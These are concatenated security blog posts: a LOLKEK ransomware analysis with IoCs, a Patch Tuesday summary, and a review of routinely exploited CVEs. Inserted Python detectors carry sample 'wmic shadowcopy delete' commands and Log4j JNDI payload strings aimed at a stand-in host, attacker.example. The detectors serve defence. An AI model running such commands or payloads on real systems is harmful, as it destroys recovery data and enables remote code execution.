LOLKEK Unmasked | An In-Depth Analysis of New Samples and Evolving Tactics

Awareness of the newest shifts and patterns is vital in the fast-changing world of cyber threats. This rings particularly true with ransomware, known for its quick changes and intricate tactics. This past August, our MDR team at SentinelOne stumbled upon something unusual in the wild: new instances of LOLKEK, or GlobeImposter as it’s also known, signaling fresh changes within this longstanding ransomware family.

This article takes you on an exploratory journey through the recent LOLKEK payloads, spotlighting key features, alterations in strategies, and shrewd observations in Indicators of Compromise (IoCs). We’ll also highlight a persistent OPSEC mistake that keeps giving away the ransomware operators’ game.

The knowledge and real-world examples provided here paint a complete picture of LOLKEK’s evolution and present-day situation. From its modest approach to ransom demands to its occasional connection with more elaborate financial assaults, comprehending LOLKEK provides insight into the wider landscape of ransomware.


LOLKEK | A Brief History

LOLKEK, also referred to as GlobeImposter, made its first appearance in 2016. In the fast-paced world of ransomware, where things change in the blink of an eye, this is like looking back to ancient history. This timeline even predates the ‘name-and-shame’ blogs that surfaced years later. To give you a perspective, Maze ransomware didn’t see the light of day until 2019. The GlobeImposter tag was a clever way to describe how this new ransomware imitated the methods of the then-known Globe ransomware.

LOLKEK can be considered a sort of ‘off-the-shelf’ ransomware. It’s something that’s frequently changed, tinkered with, and used, even by those with limited skills or resources. It’s often associated with what we might call a ‘small-time’ approach, especially regarding its targets and the ransom demands. In recent escapades, for example, the ransoms asked were often less than $2000 USD. Compare this to the eye-watering sums requested by heavyweights like Cl0p, LockBit, and Royal, and you see a sharp contrast.

LOLKEK’s primary targets tend to be small to medium-sized businesses (SMBs) and individual users. Despite this focus, there have been times when this ransomware played a part in more complex and calculated financial attacks. In 2017, for example, the infamous TA505 (also known as G0092, GOLD TAHOE) group began employing GlobeImposter, moving away from Jaff, GandCrab, and Snatch. This allowed them to widen their net and boost the power of their operations, showcasing LOLKEK’s adaptability and role in the broader ransomware landscape.

Technical Details

We recently observed the following new LOLKEK samples in the wild:

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

These samples identify themselves as “W3CRYPTO LOCKER” while also directing victims to a new TOR-based victim portal, mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion.

Both newly observed samples were compiled in May of 2023. It is worth noting that only the 58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f sample is fully functional. The 08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed sample does not fully execute and appears to have some structural corruption.

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
(possibly corrupt)
Compile time: Thu May 11 06:15:13 2023

58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f
Compile time: Thu May 11 06:15:13 2023

When launched, the new LOLKEK payloads will discover and subsequently encrypt any locally available drive including mounted network shares in sequence.

LOLKEK drive enumeration and discovery

The payloads also contain exclusions carried over from previous variants of the ransomware. These include the Windows, System Volume Information, and ProgramData folders.

These payloads appear to contain the functionality to discover and remove Volume Shadow Copies (VSS). However, this behavior was not observed when dynamically analyzing the sample 58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f. WMIC-formatted calls to remove VSS are found in the samples’ code.

VSS Removal
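The write-up notes that the payloads carry WMIC-formatted calls to remove Volume Shadow Copies (mapped to T1490 in the ATT&CK table below), even though the behaviour did not fire during dynamic analysis. Because that capability is shared with many other ransomware families, a process-creation detection for it is worth having independently of any LOLKEK sample. The following is an added example, not code from SentinelOne or from the samples; the event records and their field names (“pid”, “image”, “command_line”) are constructed for illustration and do not correspond to any particular SIEM schema.

```python
"""Detection helper for shadow-copy deletion via WMIC (ATT&CK T1490).

Added example, not code from the SentinelOne write-up. The process-creation
events below are constructed for illustration; the field names are an
assumption, not a specific telemetry schema.
"""

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic shadowcopy delete"},
    {"pid": 4131, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic /node:localhost shadowcopy delete /nointeractive"},
    {"pid": 4150, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": "wmic os get caption"},           # benign inventory query
    {"pid": 4162, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir C:\\Users"},       # unrelated process
]


def _tokens(command_line):
    """Lower-case whitespace tokens with surrounding quotes stripped."""
    return [t.strip('"').lower() for t in command_line.split()]


def is_wmic_shadowcopy_delete(command_line):
    """True if the command line asks WMIC to delete volume shadow copies.

    The first token must be wmic (bare or as a full path), and after dropping
    WMIC's global switches (/node:..., /nointeractive, ...) the alias must be
    'shadowcopy' followed by the verb 'delete'.
    """
    toks = _tokens(command_line)
    if not toks or not toks[0].endswith(("wmic", "wmic.exe")):
        return False
    body = [t for t in toks[1:] if not t.startswith("/")]
    return len(body) >= 2 and body[0] == "shadowcopy" and body[1] == "delete"


def find_shadow_copy_deletion(events):
    """Return the pids of events whose command line deletes shadow copies."""
    return [e["pid"] for e in events
            if is_wmic_shadowcopy_delete(e["command_line"])]


if __name__ == "__main__":
    for pid in find_shadow_copy_deletion(SAMPLE_EVENTS):
        print("T1490 Inhibit System Recovery: shadow copies deleted by pid", pid)
```

Matching on the tokenised alias and verb rather than on a raw substring keeps the rule from firing on the many legitimate `wmic <alias> get ...` inventory commands while still catching the call when global switches are interleaved.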

Encrypted files, once fully processed, will have the “.MMM” extension appended to them.

When looking deeper into the encrypted files themselves, we see another identifying marker linking them to previous generations of LOLKEK/GlobeImposter. Encrypted files contain the same “CRYPTO LOCKER” string seen in said prior generations.

CRYPTO LOCKER string in 58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

LOLKEK Victim Portal and Notes

The LOLKEK ransom notes are written as ReadMe.txt to all locations containing encrypted files and data. The format and construction of the ransom notes is identical to what we have seen previously with this ransomware family.

The supplied .ONION URIs all contain a string at the end, unique to each execution of the ransomware.

Examples (defanged):
http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]M01YOOOOOOO
http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]m01TGRFBRRRR
http[:]//mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion/[?]M01VXOQRTKM

LOLKEK ransom note construction
LOLKEK ransom note (May 2023)
Legacy GlobeImposter (TZW) ransom note
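The three on-disk artifacts described above (the “.MMM” extension, the “CRYPTO LOCKER” marker inside encrypted files, and the ReadMe.txt note whose .onion URI ends in a per-execution string) are enough to build a small triage script for an affected host. The following is an added example, not code from SentinelOne or from the samples. It assumes the marker can be found anywhere in an encrypted file, since the write-up does not give its offset, and it builds its sample directory tree itself in a temporary folder; the note text in that tree is constructed and only the onion address and one of the published suffixes come from the write-up.

```python
"""Triage helper for LOLKEK/GlobeImposter file-system artifacts.

Added example, not code from the SentinelOne write-up. Walks a directory
tree and reports (1) ".MMM" files that also contain the "CRYPTO LOCKER"
marker (assumption: marker searched for anywhere in the file) and
(2) ReadMe.txt ransom notes, with the per-execution suffix pulled off the
.onion URI so separate detonations can be told apart.
"""
import os
import re
import tempfile

MARKER = b"CRYPTO LOCKER"
ENCRYPTED_EXT = ".MMM"
NOTE_NAME = "ReadMe.txt"
ONION = "mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad"
# Accept both the live form (.onion/?SUFFIX) and the defanged form used in
# reports ([.]onion/[?]SUFFIX).
_URI_RE = re.compile(ONION + r"(?:\[\.\]|\.)onion/(?:\[\?\]|\?)([A-Za-z0-9]+)")


def note_suffixes(text):
    """Return the distinct per-execution suffixes found in a ransom note."""
    return sorted(set(_URI_RE.findall(text)))


def is_lolkek_encrypted(path):
    """True if the file has the .MMM extension and carries the marker string."""
    if not path.upper().endswith(ENCRYPTED_EXT):
        return False
    with open(path, "rb") as fh:
        return MARKER in fh.read()


def triage(root):
    """Walk root; return (sorted encrypted file paths, {note path: suffixes})."""
    encrypted, notes = [], {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower() == NOTE_NAME.lower():
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    notes[full] = note_suffixes(fh.read())
            elif is_lolkek_encrypted(full):
                encrypted.append(full)
    return sorted(encrypted), notes


def build_sample_tree(root):
    """Create a constructed victim folder: two hits, one decoy, one note."""
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    filler = bytes(range(64))
    with open(os.path.join(docs, "budget.xlsx.MMM"), "wb") as fh:
        fh.write(MARKER + b"\x00" * 16 + filler)     # marker at file start
    with open(os.path.join(docs, "photo.jpg.MMM"), "wb") as fh:
        fh.write(filler + MARKER + filler)           # marker mid-file
    with open(os.path.join(docs, "unrelated.MMM"), "wb") as fh:
        fh.write(filler)                             # extension only: not counted
    with open(os.path.join(docs, NOTE_NAME), "w", encoding="utf-8") as fh:
        fh.write("YOUR FILES ARE ENCRYPTED\n"        # constructed note body
                 "http://" + ONION + ".onion/?M01YOOOOOOO\n")
    return docs


def run_demo():
    """Triage a constructed tree; return (encrypted-file count, note suffixes)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        encrypted, notes = triage(root)
        suffixes = sorted(s for lst in notes.values() for s in lst)
        return len(encrypted), suffixes


if __name__ == "__main__":
    count, suffixes = run_demo()
    print(f"{count} LOLKEK-encrypted files; note suffixes: {suffixes}")
```

Requiring both the extension and the marker avoids counting unrelated files that happen to end in .MMM, and recording the URI suffix per note lets an analyst tell whether several hosts were hit by one execution or by separate ones.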

Current LOLKEK victims are instructed to navigate to the TOR-based victim portal where they must register an account to engage in a ‘private’ chat session with the attackers. Again, we note that the newly staged portal is functionally identical to previous victim portals staged by this operation. The look, feel, and process has not changed.

LOLKEK victim portal – TZW variation (February 2023)
LOLKEK victim portal (May 2023)

At this point, victims are able to chat with their attacker. Small files can be decrypted for free as ‘proof’ of functional decryption. Should the victim choose to comply, they will receive details on how and where to pay via a ticketing-like interface.

Upon ticket creation, the ransom details are automatically provided in the victim chat. As we see in this example, the ransom demanded is $1350 USD. Payments must be made via Bitcoin (BTC).

LOLKEK support

A LOLKEK OPSEC Misstep

The operators behind this campaign appear to have followed the same steps, process, and template as their pre-existing counterparts with regards to misconfiguration of Apache. The status page of the server is visible on the TOR-based victim page.

Apache service status

From here, we can see that the server went live on May 23, 2023, just a short time after the related samples’ compilation date of May 11, 2023. When analyzing these threats, it is always worthwhile to examine these surface-level misconfigurations. A great deal can be learned about a campaign and threat actor through this step alone. In this case, the same configuration misstep seen in the previous TZW and GlobeImposter campaigns helps solidify the link between them and this new activity.

Conclusion

The journey of LOLKEK, or GlobeImposter, through the ever-shifting landscape of commodity ransomware is fascinating. While giants like LockBit and Cl0p dominate the headlines with their sophisticated schemes, it’s essential not to overlook the small-scale but persistent operations like LOLKEK. These lesser-known threats continue to evolve, find new ways to attack, and pose very real risks.

What we’re observing with LOLKEK is not a stagnant picture. Its operators are relentlessly exploring new strategies, pivoting to fresh infrastructure, and experimenting with innovative payloads. The examples we’ve highlighted may very well be the first stirrings of a new chapter for this adaptable threat. Although smaller in scale, it has shown the potential to align with more targeted, sophisticated campaigns. It’s not unthinkable that we could see LOLKEK targeting larger organizations and demanding higher ransoms in the future.

Protection against ever-adaptive threats like LOLKEK demands a robust defense. The SentinelOne Singularity XDR Platform is designed to recognize, counter, and eliminate all malicious behaviors and elements associated with LOLKEK/GlobeImposter-based attacks. If you wish to arm yourself with the technology that stays one step ahead of threats like these, contact us today or book a demo. We’re here to help ensure that the next chapter in the ransomware story doesn’t include you.

Indicators of Compromise

SHA1

ed247b58c0680b7c92632209181733e92f1b0721
768b8d81a6b0f779394e4af48755ca3ad77ed951

SHA256

08029396eb9aef9b413582d103b070c3f422e2b56e1326fe318bef60bdc382ed
58ac26d62653a648d69d1bcaed1b43d209e037e6d79f62a65eb5d059e8d0fc3f

Ransom Notes SHA256

2c66e5f96470526219f40c6adfd6990cc28d520975da1fdb6bb5497d55a54117
0b179973dc267d9c300e9b7d3c27c67a18d7c79b2cc34927cbe5a465f83c6190

Ransom Notes SHA1 

88baff4e1751bd364cdb1a4bb5fda4a37ee127c4
456b0bda3f6d9ec9a874daac050b75fc28174510

IPs/URLs/Domains

mmcbkgua72og66w4jz3qcxkkhefax754pg6iknmtfujvkt2j65ffraad[.]onion
https[:]//yip[.]su/2QstD5
filessupport@onionmail[.]org

MITRE ATT&CK

T1005 – Data from Local System
T1202 – Indirect Command Execution
T1486 – Data Encrypted for Impact
T1070.004 – Indicator Removal: File Deletion
T1112 – Modify Registry
T1012 – Query Registry
T1083 – File and Directory Discovery
T1027.002 – Obfuscated Files or Information: Software Packing
T1082 – System Information Discovery
T1490 – Inhibit System Recovery
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Microsoft Patch Tuesday, August 2023 Edition

Microsoft Corp. today issued software updates to plug more than 70 security holes in its Windows operating systems and related products, including multiple zero-day vulnerabilities currently being exploited in the wild.

Six of the flaws fixed today earned Microsoft’s “critical” rating, meaning malware or miscreants could use them to install software on a vulnerable Windows system without any help from users.

Last month, Microsoft acknowledged a series of zero-day vulnerabilities in a variety of Microsoft products that were discovered and exploited in in-the-wild attacks. They were assigned a single placeholder designation of CVE-2023-36884.

Satnam Narang, senior staff research engineer at Tenable, said the August patch batch addresses CVE-2023-36884, which involves bypassing the Windows Search Security feature.

“Microsoft also released ADV230003, a defense-in-depth update designed to stop the attack chain associated that leads to the exploitation of this CVE,” Narang said. “Given that this has already been successfully exploited in the wild as a zero-day, organizations should prioritize patching this vulnerability and applying the defense-in-depth update as soon as possible.”

Redmond patched another flaw that is already seeing active attacks — CVE-2023-38180 — a weakness in .NET and Visual Studio that leads to a denial-of-service condition on vulnerable servers.

“Although the attacker would need to be on the same network as the target system, this vulnerability does not require the attacker to have acquired user privileges,” on the target system, wrote Nikolas Cemerikic, cyber security engineer at Immersive Labs.

Narang said the software giant also patched six vulnerabilities in Microsoft Exchange Server, including CVE-2023-21709, an elevation of privilege flaw that was assigned a CVSSv3 (threat) score of 9.8 out of a possible 10, even though Microsoft rates it as an important flaw, not critical.

“An unauthenticated attacker could exploit this vulnerability by conducting a brute-force attack against valid user accounts,” Narang said. “Despite the high rating, the belief is that brute-force attacks won’t be successful against accounts with strong passwords. However, if weak passwords are in use, this would make brute-force attempts more successful. The remaining five vulnerabilities range from a spoofing flaw and multiple remote code execution bugs, though the most severe of the bunch also require credentials for a valid account.”

Experts at security firm Automox called attention to CVE-2023-36910, a remote code execution bug in the Microsoft Message Queuing service that can be exploited remotely and without privileges to execute code on vulnerable Windows 10, 11 and Server 2008-2022 systems. Microsoft says it considers this vulnerability “less likely” to be exploited, and Automox says while the message queuing service is not enabled by default in Windows and is less common today, any device with it enabled is at critical risk.

Separately, Adobe has issued a critical security update for Acrobat and Reader that resolves at least 30 security vulnerabilities in those products. Adobe said it is not aware of any exploits in the wild targeting these flaws. The company also issued security updates for Adobe Commerce and Adobe Dimension.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a fair chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

- SANS Internet Storm Center listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

- AskWoody.com, which keeps tabs on any developing problems related to the availability or installation of these updates.

Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities

Leveraging known bugs and unpatched exploits continues to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.

While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.

In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.

1. Fortinet FortiOS & FortiProxy (CVE-2018-13379)

Fortinet FortiOS SSL VPNs are primarily used in border firewalls and work by fencing off sensitive internal networks from the public internet. In the case of CVE-2018-13379, a particularly severe path traversal flaw, APT actors could use specially crafted HTTP resource requests to steal legitimate credentials and connect to unpatched VPNs and download system files. Though a patch was released back in 2019, CVE-2018-13379 has come back around several times in the past three years targeting government, commercial, and technology service networks.

In 2020, a hacker posted a list of one-line exploits to steal VPN credentials from nearly 50,000 Fortinet VPN devices using this flaw. Security researchers at the time pointed out that of the 50,000 domains, over four dozen belonged to well-known financial and government organizations. Later that year, the flaw appeared again, this time exploited by government-backed actors working to compromise US election support systems. For this campaign, CVE-2018-13379 was chained together with other vulnerabilities to exploit Internet-exposed servers and gain access. This vulnerability was seen once more in 2021 when 87,000 sets of credentials for Fortigate SSL VPN devices were leaked online, obtained through the exploitation of CVE-2018-13379.

These critical flaws remain lucrative to threat actors who bank on Fortinet’s widespread popularity and adoption as a provider of VPN solutions. The larger the user base, the more potential targets there are, which increases the appeal for attackers. As a result of their frequent abuse, the FBI and CISA have since issued a joint advisory warning users and administrators of Fortinet against advanced persistent threat (APT) actors actively exploiting existing and future critical VPN vulnerabilities. It is highly likely that these flaws will continue to be used to gain an initial foothold in vulnerable environments as a precursor for future attacks.

For more details on this vulnerability, refer to the advisory. Fortinet has also provided steps for mitigation and prevention here.

2 – 4. Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)

Microsoft Exchange Server is a popular email and support system for organizations worldwide, deployed both on-premises and in the cloud. First seen in 2021, a chain of vulnerabilities identified in unpatched on-premises editions of Microsoft Exchange Server is still actively being exploited on internet-facing servers.

This chain of vulnerabilities is known collectively as “ProxyShell” and comprises CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523, which together affect several versions of on-premises Microsoft Exchange Server. ProxyShell targets unpatched Exchange servers to achieve pre-authenticated remote code execution (RCE). Out of the three, CVE-2021-34473 has the highest CVSS score, at 9.1. While the remaining two were initially classified as “exploitation less likely”, they bring significant value to attackers when used in combination with CVE-2021-34473. Together, ProxyShell allows attackers to execute arbitrary commands on vulnerable Exchange servers over port 443.

All three flaws were patched in 2021, but security researchers currently track several uncategorized threat (UNC) groups that are known to exploit ProxyShell vulnerabilities while predicting more clusters to appear as future generations of threat actors adopt working exploits. In a particular cluster of threat activity tracked as UNC2980, Mandiant researchers observed the ProxyShell vulnerabilities leveraged in a cyber espionage operation reportedly linked to Chinese-speaking actors. In this operation, UNC2980 dropped multiple tools into a US-based university’s environment after gaining access and deploying a web shell by exploiting ProxyShell. After exploitation via ProxyShell, the threat actors used publicly available tools such as Mimikatz, HTRAN, and EarthWorm to conduct post-exploitation activities.

Since its discovery, multiple intrusions leveraging ProxyShell have targeted the education, government, business services, and telecommunications industries. Microsoft’s security updates from May 2021 and June 2021 list the necessary updates that protect against ProxyShell. For more details on the vulnerability, see Microsoft’s blog post.

5. Microsoft Various Products (CVE-2022-30190)

Dubbed “Follina”, CVE-2022-30190 is a high-severity RCE vulnerability that affects multiple Microsoft Office products. Thought to be leveraged by a variety of Chinese-speaking threat actors, Follina allows the execution of arbitrary code after convincing users to open malicious Word documents or through any other vector that processes URLs. Follina continues to be seen in various cyberattacks due to the large number of unpatched versions of Microsoft Office products still in use. It was first publicly disclosed in May of 2022.

Threat actors are known to exploit the Follina vulnerability through phishing scams, which use social engineering techniques to trick users into opening malicious Office documents. When users encounter embedded links within Office applications, these links are automatically fetched, triggering the execution of the Microsoft Support Diagnostic Tool (MSDT) protocol. MSDT (msdt.exe) is a Microsoft service primarily designed to collect system crash information for reporting to Microsoft support. However, threat actors can exploit this protocol by crafting links to force the execution of malicious PowerShell commands without requiring any further user interaction. This poses a serious security risk, as it allows attackers to remotely execute unauthorized commands on the targeted system through seemingly innocuous links.

The Follina flaw has more recently been exploited as a zero-day to support threat campaigns against organizations in critical industries. From March to May of 2022, an activity cluster tracked as UNC3658 exploited Follina to target the Philippine government. In April of the same year, additional samples of Follina appeared in a campaign against South Asian telecommunication entities and business services by UNC3347. In a third cluster, dubbed UNC3819, CVE-2022-30190 was used to attack organizations in Russia and Belarus, suggesting a possible lure with content related to the illegal invasion of Ukraine.

CISA has urged Microsoft users and administrators to review Microsoft’s Guidance for CVE-2022-30190 to apply the necessary workarounds.

6. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)

In late 2021, at least nine entities across the defense, healthcare, energy, technology, and education sectors were compromised through a patched critical flaw in Zoho’s ManageEngine ADSelfService Plus. The product offers a comprehensive self-service password management and single sign-on (SSO) solution tailored for Active Directory and cloud applications. This tool is designed to allow administrators to enforce two-factor authentication (2FA) for secure application logins while granting users the ability to reset their passwords autonomously.

Tracked as CVE-2021-40539, the vulnerability enabled threat actors to gain initial access to victim organizations’ systems. CVE-2021-40539 (CVSS 9.8) is an authentication bypass vulnerability affecting REST API URLs that could be used for RCE. In response to this, CISA issued a warning against the zero-day flaw and how it could be used to deploy webshells, allowing an actor to conduct post-exploitation activities, such as stealing administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory (AD) files.

Vulnerabilities in SSO solutions for AD and cloud applications are particularly nefarious. Should they be successfully exploited, attackers can essentially gain access to critical applications, sensitive data, and other areas deep within the corporate network through AD.

CVE-2021-40539 exploit analysis flowchart (Source: Zoho)

Most recently, exploitation of CVE-2021-40539 was observed in an attack against the International Committee of the Red Cross (ICRC). In their statement, Red Cross admitted to missing the critical patch that would have protected them from the exploit, highlighting the importance of maintaining a robust patch management process. As a result of the attack, the names, locations, and contact information of over 515,000 individuals part of the ICRC’s Restoring Family Links program were compromised.

Read Zoho’s advisory for more details about this vulnerability and how to update to ADSelfService Plus build 6114.

7 – 8. Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)

Atlassian Confluence, being a collaboration and documentation platform in use by many governments and private enterprises, continues to draw significant attention from threat actors. In CISA’s latest list of routinely exploited flaws, the Australian-based company holds two spots in the form of CVE-2021-26084 and CVE-2022-26134, which are both related to a case of Object-Graph Navigation Language (OGNL) injection.

Mass exploitation of CVE-2021-26084 first occurred in September 2021 and targeted the widely popular web-based documentation service. Confluence is designed to allow collaboration between multiple teams on shared projects. CVE-2021-26084 is a command injection vulnerability that could be exploited to execute arbitrary code on a Confluence Server or Data Center instance. Essentially having the same permissions as the user running the service, the attacker is able to execute any command, gain elevated admin privileges, and establish a foothold in the environment. CISA released an advisory guiding users and administrators to review Atlassian’s updates to prevent compromise.

Just nine months later, Atlassian rolled out a warning for another OGNL injection vulnerability targeting their Confluence Server & Data Center. Tracked as CVE-2022-26134, it enables an unauthenticated attacker to execute arbitrary code in all supported versions of Confluence Data Center and Server. This critical-level flaw quickly became one of the top exploited bugs after a proof-of-concept (PoC) was released within a week of its initial disclosure. In this instance, CVE-2022-26134 was used to achieve unauthenticated RCE on the server and then drop a Behinder web shell. The Behinder web shell gave the actors very powerful capabilities such as interaction with Meterpreter and Cobalt Strike as well as memory-only web shells.

According to Atlassian’s website, the company supports 83% of Fortune 500 companies, 10 million monthly active users, and over 235,000 users in over 190 countries. The two Atlassian-based CVEs showcase how financially-motivated threat actors will continuously leverage exploits to reach many attractive targets at once.

9. Log4Shell (CVE-2021-44228)

Log4shell, assigned as CVE-2021-44228 and also known as “the Log4j vulnerability”, is a maximum severity RCE flaw found in Apache Log4j, a popular Java-based logging library used widely in various applications. This vulnerability allows remote attackers to execute arbitrary code on affected systems, potentially leading to unauthorized access, data breaches, and even full system compromise.

The vulnerability came to light in December 2021 when it was first publicly disclosed. The issue originated from the use of untrusted data in the “log4j2” component’s look-up mechanism, enabling attackers to inject malicious code through crafted log messages. This flaw exposed a wide variety of applications, including web servers, enterprise software, and cloud-based services, that all relied on Log4j for logging.

Though Apache quickly released a patch for the level 10.0-rated RCE vulnerability, security experts confirm that exploitation will be ongoing and could lead to widespread malware deployment given its broad use across major vendors. CISA has since issued a binding operational directive (BOD), ordering federal civilian executive branch (FCEB) agencies to patch their systems against this critical vulnerability.

The rapid exploitation of Log4shell is attributed to its widespread adoption across diverse industries and platforms. The Apache Log4j library has been a staple in the Java community for many years, making it present in countless applications and systems. What’s more, patching the vulnerability has proved challenging, as many organizations struggle to identify and update all instances of Log4j within their infrastructures promptly.
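Because the flaw is triggered by attacker-controlled text reaching a Log4j lookup, one practical detection while inventory and patching are still under way is to scan what the application actually logged (request paths, User-Agent headers, form fields) for the “${jndi:…}” lookup form and record which scheme and host each one points at. The following is an added example, not code from SentinelOne, CISA or the Apache project; the access-log lines are constructed and the hostnames use the reserved .example domain.

```python
"""Scan log lines for Log4j JNDI lookup strings (CVE-2021-44228 detection).

Added example, not code from the post or from Apache. Finds the
"${jndi:<scheme>:<target>}" lookup form in logged text and reports the
scheme and target so hits can be triaged. The log lines are constructed.
"""
import re

# Constructed sample web-access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /search?q=${jndi:rmi://attacker.example:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

# ${jndi:<scheme>:<target>}; whitespace around the separators is tolerated and
# the target runs up to the closing brace.  The "${env:...}" lookup on the last
# line is a different Log4j lookup and deliberately does not match.
_JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//?([^}\s]*)\}", re.IGNORECASE)


def find_jndi_lookups(text):
    """Return (scheme, target) pairs for every JNDI lookup string in text."""
    return [(scheme.lower(), target) for scheme, target in _JNDI_RE.findall(text)]


def scan_log(log_text):
    """Return (line number, scheme, target) for each lookup found in the log."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((lineno, scheme, target))
    return hits


if __name__ == "__main__":
    for lineno, scheme, target in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: JNDI lookup via {scheme} -> {target}")
```

A hit in a log does not by itself mean the lookup was resolved (a patched or mitigated Log4j leaves the string inert), but the extracted target gives the host to block or investigate, and the line number ties the attempt back to the request that carried it.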

See CISA’s GitHub repository for known affected products and patch information and their dedicated page containing technical details and patching guidelines for impacted organizations.

10 – 11. VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)

VMware is a popular virtualization software, making it a frequent target for all levels of cyber attackers including advanced persistent threat (APT) groups. Exploiting vulnerabilities in VMware could grant unauthorized access to virtual machines and critical data hosted on the platform. Since VMware virtualizes multiple systems on a single physical server, a successful attack could potentially compromise multiple VMs simultaneously. Oftentimes, attackers choose to target VMware environments in order to gain a foothold in larger networks, exploiting the trust and accessibility of the virtualized infrastructure. VMware vulnerabilities take up two spots in CISA’s list of top exploited flaws this year.

First, CVE-2022-22954 (CVSS 9.8) is a server-side template injection vulnerability that could be triggered by a malicious actor with network access to achieve RCE in VMware’s Workspace ONE Access & Identity Manager. After PoCs for the vulnerability were published in spring of last year, security researchers saw it used in active attacks infecting servers with coin miners – a common first mode of attack when new flaws are exploited. VMware has published a security advisory with more details of this vulnerability here.

Second, CVE-2022-22960 (CVSS ) is a privilege escalation vulnerability. According to CISA’s advisory on this vulnerability, it enables a malicious actor with local access to escalate privileges to root due to improper permissions in support scripts. If chained together with CVE-2022-22954, an actor could execute an arbitrary shell command as a VMware user and then wipe logs, escalate permissions, and move laterally to other systems with root access.

Since VMware products are used commonly across Federal Civilian Executive Branch (FCEB) agencies among other critical industries, CISA ordered an emergency directive for government agencies to complete a series of mitigation measures. These measures can be found here.

12. F5 Networks BIG-IP (CVE-2022-1388)

A few days after F5 published a patch for a critical RCE vulnerability tied to their BIG-IP suite of products last September, security researchers were able to create an exploit for the flaw. Classified as a missing authentication vulnerability, CVE-2022-1388 (CVSS 9.8) relates to an iControl REST authentication bypass that could lead to attackers gaining access and taking control of a compromised BIG-IP system. The attacker could perform a number of malicious actions such as dropping webshells for future attacks, deploying cryptocurrency miners, and exfiltrating sensitive data.

Remote code execution flaws are trivial to exploit, making them popular for targeting by opportunistic threat actors. Whenever vulnerabilities are found in internet-facing services, threat actors are sure to make quick work in leveraging them. Exploits like CVE-2022-1388 provide immediate, initial access to a targeted network and often enable attackers to follow through with lateral movement and privilege escalation; critical tactics in the cyberattack kill chain.

F5’s security advisory detailing CVE-2022-1388 indicators of compromise (IoCs) and steps for mitigation can be found here. CISA also released an advisory in response to the flaw in response to several PoCs that were published shortly after initial disclosure.

Conclusion

Enterprise security teams must acknowledge that old vulnerabilities persist and continue to pose a significant threat. While the latest CVEs often receive the spotlight, CISA’s annual list of routinely exploited vulnerabilities serves as a stark reminder that existing flaws are still capable of inflicting serious damage on vulnerable systems.

In addition to the comprehensive list, CISA offers guidance to vendors and tech organizations for identifying and mitigating potential risks. The recommendations include adopting secure-by-design practices and prioritizing patching known exploited vulnerabilities, thus minimizing the risk of compromise. Vendors are also encouraged to establish coordinated vulnerability disclosure programs, enabling root cause analysis for discovered flaws.

SentinelOne is ready to help security leaders defend their organizations against every level of cyberattack. To see how we can help you build a robust security posture, contact us today or book a demo.

Meet the Brains Behind the Malware-Friendly AI Chat Service ‘WormGPT’

